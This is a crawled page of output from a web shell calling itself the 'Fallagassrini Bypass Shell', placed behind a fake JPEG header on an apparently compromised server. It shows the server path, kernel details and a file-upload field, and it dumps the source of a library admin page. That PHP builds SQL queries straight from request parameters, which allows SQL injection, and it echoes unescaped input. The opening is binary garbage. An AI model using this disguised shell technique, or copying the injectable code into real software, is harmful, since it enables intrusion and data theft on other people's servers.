JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/llm/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/llm/manage_author.php

<?php include('config.php');
include('is_autheticated.php');

$name=$_POST['name'];
	
if($_POST['add_author'])
{
	$cheks=mysql_query("select * from author where name='".$name."'");
	 $cheks1=mysql_num_rows($cheks);
	 //print_r($cheks1);
	 
	if($cheks1!=1)
	{
	
	 $source=mysql_query("insert into author(name)values('$name')");
	 if($source)
	 {
	 ?>
    <script type="text/javascript">
	window.location.href="manage_author.php?msg=success";
	</script>
    <?php	 }
	}
	 
	 else
	 {
	 $msg_display1="Already Author Added";
	 }
}

if($_POST['update_author'])
{
	
     //echo	"update book set author='".$_POST['name']."' where author='".$_REQUEST['author']."'";//exit;
	 $source=mysql_query("update book set author='".$_POST['name']."' where author='".$_REQUEST['author']."'");
	$source=mysql_query("update author set name='".$_POST['name']."' where id='".$_POST['id']."'");
	 if($source)
	 {
	?>
    <script type="text/javascript">
	window.location.href="manage_author.php?msg=updated";
	</script>
    <?php

	 }
}

 ?>
<!DOCTYPE html>
<html lang="en">
	
<!-- Mirrored from jesus.gallery/cloud2/invoice.html by HTTrack Website Copier/3.x [XR&CO'2013], Sat, 18 Apr 2015 04:41:34 GMT -->
<head>
		<meta charset="UTF-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1.0"> 
		<title>Easwari Lending Library</title>
		<meta name="description" content="Cloud Admin Panel" />
		<meta name="keywords" content="Admin, Dashboard, Bootstrap3, Sass, transform, CSS3, HTML5, Web design, UI Design, Responsive Dashboard, Responsive Admin, Admin Theme, Best Admin UI, Bootstrap Theme, Bootstrap, Light weight Admin Dashboard,Light weight, Light weight Admin, Light weight Dashboard" />
		<meta name="author" content="Bootstrap Gallery" />
		<link rel="stylesheet" href="css/bootstrap.min.css" />
<link rel="stylesheet" href="css/bootstrap-responsive.min.css" />
<link rel="stylesheet" href="css/colorpicker.css" />
<link rel="stylesheet" href="css/datepicker.css" />
<link rel="stylesheet" href="css/uniform.css" />
<link rel="stylesheet" href="css/select2.css" />
<link rel="stylesheet" href="css/matrix-style.css" />
<link rel="stylesheet" href="css/matrix-media.css" />
<link rel="stylesheet" href="css/bootstrap-wysihtml5.css" />
<link href="font-awesome/css/font-awesome.css" rel="stylesheet" />
<link href='http://fonts.googleapis.com/css?family=Open+Sans:400,700,800' rel='stylesheet' type='text/css'>

<link rel="stylesheet" href="css/animate.css" />
<link rel="stylesheet" href="css/fullcalendar.css" />
<link rel="stylesheet" href="css/jquery.gritter.css" />

	</head>  

	<body>

		<!-- Left sidebar start -->
		<?php include('left_menu.php'); ?>
		<!-- Left sidebar end -->

		<!-- Dashboard Wrapper Start -->
		<div class="dashboard-wrapper">

			<!-- Header start -->
			<?php include('header.php'); ?>
			
			<div id="content">
<!--breadcrumbs-->
  <div id="content-header">
    <div id="breadcrumb"> <a href="index.php" title="Go to Home" class="tip-bottom"><i class="icon-home"></i> Home</a><a href="#" class="tip-bottom">Books</a> <a href="#" class="current">Manage Author</a></div>
  </div>
<!--End-breadcrumbs-->

<!--Action boxes-->
   
  <div class="container-fluid">
    <div class="row-fluid">
  <div class="span12">
      <div class="widget-box">
        <div class="widget-title"> <span class="icon"> <i class="icon-th-large"></i> </span>
          <h5>Manage Author</h5><span class="icon" style="float:right"><a href="#" onClick="add_fun()"> <i class="icon-plus" title="Add Author"></i></a> </span>
        </div>
		
		<div class="widget-content nopadding">
			  <form name="publication" id="publication" method="post" class="form-horizontal">
			                  <label for="exampleInputEmail1" class="control-label">Search Author</label>
							  <div class="controls">
			                  <input type="text"  id="book" name="book" required>
							<input type="submit" name="search_book" value="Search"   class="btn btn-success"  style="margin-left:15px;"/></div>
			             </form>
						  <?php if($_GET['msg']=='success') { ?> <p <b style="color:#009900">New Author Added Successfully</p> <?php } ?>
						   <?php if($_GET['msg']=='updated') { ?> <p <b style="color:#009900">Author Updated Successfully</p> <?php } ?>
						  <form name="author" id="author" method="post" class="form-horizontal" style="display:none">
						  <label style="color:#009900; margin-left:5px; margin-top:5px"><?php echo $msg_display;?><?php echo $msg_display1;?></label>
			               
                         
			                  <label for="exampleInputEmail1" class="control-label">Name</label>
							  <div class="controls">
			                  <input type="text"  id="name" name="name" required>
							<input type="submit" name="add_author" value="Add"   class="btn btn-success" style="margin-left:15px;" /></div>
			              </form>
						   
						    <form name="up_author" id="up_author" method="post" class="form-horizontal" style="display:none">
			                <label style="color:#009900; margin-left:5px"><?php echo $msg_display;?><?php echo $msg_display1;?> </label>
							 <?php
										$step=mysql_fetch_array(mysql_query("select * from author where id='".$_GET['uid']."'"));
										
										?>
										
							<label for="exampleInputEmail1" class="control-label">Name</label>
							  <div class="controls">
                              <input type="hidden" class="form-control" id="author" name="author" value="">
							   <input type="hidden" class="form-control" id="id" name="id" value="">
                              <input type="text" class="form-control" id="name" name="name" value="">
                              <input type="submit" name="update_author" value="Submit"   class="btn btn-success" style="margin-left:15px;" /></div>
			              </form>
			                <table class="table table-condensed table-striped table-bordered data-table" style="margin-top:18px;">    
			                  <thead>
			                    <tr>
			                      
			                      <th style="width:40%">Name</th>
								  
								   <th style="width:60%" class="hidden-phone">Actions</th>
			                     
			                    </tr>
			                  </thead>
			                  <tbody>
							  
							   <?php
							    if(isset($_REQUEST['search_book']))
								{
								$name=$_REQUEST['book'];
								$source=mysql_query("select * from author where name like '%$name%' order by id desc");
								}
								else
								{		
								$source=mysql_query("select * from author order by id desc limit 0,50");
								}
										while($step=mysql_fetch_array($source))
										{
										?>
			                    <tr class="gradeA">
								
								
			                     
			                      <td><?php echo $step['name']; ?></td>

								  
								   <td class="hidden-phone">
			                        <a href="#" class="label label label-danger" onClick="edit_fun('<?php echo $step['id']; ?>','<?php echo $step['name']; ?>');"><i class="icon icon-edit" title="Edit Author"></i></a>
									
								
							 <a href="author_action.php?did=<?php echo $step['id']; ?>" class="label label label-danger"><i class="icon icon-trash" title="Delete Author"></i></a>
			                      </td>
								  
			                     
			                    </tr>
			                    
			                    <?php } ?>
			             
			            <?php if($_GET['msg']=='deleted') { ?> <p <b style="color:#900">Deleted Successfully</p> <?php } ?>
			                  </tbody>
			                </table>
							
			              </div>
			            </div>
			          </div>
			        </div>
			      </div>
					<!-- Spacer ends -->
				</div>
				<!-- Container fluid ends -->
			<!-- Main Container Start -->

				<!-- Footer Start -->
			<div class="row-fluid">
  <div id="footer" class="span12"> Copyright Cloud Admin <span>2015</span>. All Rights Reserved. </div>
</div>			<!-- Footer end -->
			
		</div>
		<!-- Dashboard Wrapper End -->

			<script src="js/jquery.min.js"></script> 
		<script src="js/jquery.ui.custom.js"></script> 
		<script src="js/bootstrap.min.js"></script> 
		<script src="js/jquery.uniform.js"></script> 
		<script src="js/select2.min.js"></script> 
		<script src="js/jquery.dataTables.min.js"></script> 
		<script src="js/matrix.js"></script> 
		<script src="js/matrix.tables.js"></script>
		<script src="js/jquery.ui.custom.js"></script> 
		<script src="js/bootstrap-colorpicker.js"></script> 
		<script src="js/bootstrap-datepicker.js"></script> 
		<script src="js/jquery.toggle.buttons.js"></script> 
		<script src="js/masked.js"></script> 
		<script src="js/excanvas.min.js"></script> 
<script src="js/jquery.flot.min.js"></script> 
<script src="js/jquery.flot.resize.min.js"></script> 
<script src="js/matrix.dashboard.js"></script> 
<script src="js/matrix.form_validation.js"></script> 
<script src="js/jquery.wizard.js"></script> 
<script src="js/jquery.uniform.js"></script> 
<script src="js/matrix.popover.js"></script> 
<script src="js/jquery.dataTables.min.js"></script> 
<script src="js/matrix.tables.js"></script> 
<style type="text/css">

	

	button, input, select, textarea {

    border: 2px solid #bfe0f3;

    border-radius: 0;

    box-shadow: none;

    height: 40px;

	 padding: 8px 16px;

}

	

	

	.read_charges {

    border: 2px solid #bfe0f3;

    border-radius: 0;

    box-shadow: none;

    height: 40px;

    padding: 8px 16px;

}

	</style>
		<script type="text/javascript">
      //Data Tables
      $(document).ready(function () {
        $('#data-table').dataTable({
		"bSort": false,
          "sPaginationType": "full_numbers"
        });
        $("#data-table_length").css("display","none")
      });
    </script>
<script type="text/javascript">
function add_fun()
{
$('#author').show();
$('#up_author').hide();
}
</script>
<script type="text/javascript">
function edit_fun(id,value)
{
$('#up_author').show();
$('#author').hide();
document.forms['up_author'].elements['id'].value=id;
document.forms['up_author'].elements['name'].value=value;
document.forms['up_author'].elements['author'].value=value;
}
</script>
	</body>

<!-- Mirrored from jesus.gallery/cloud2/invoice.html by HTTrack Website Copier/3.x [XR&CO'2013], Sat, 18 Apr 2015 04:41:37 GMT -->
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net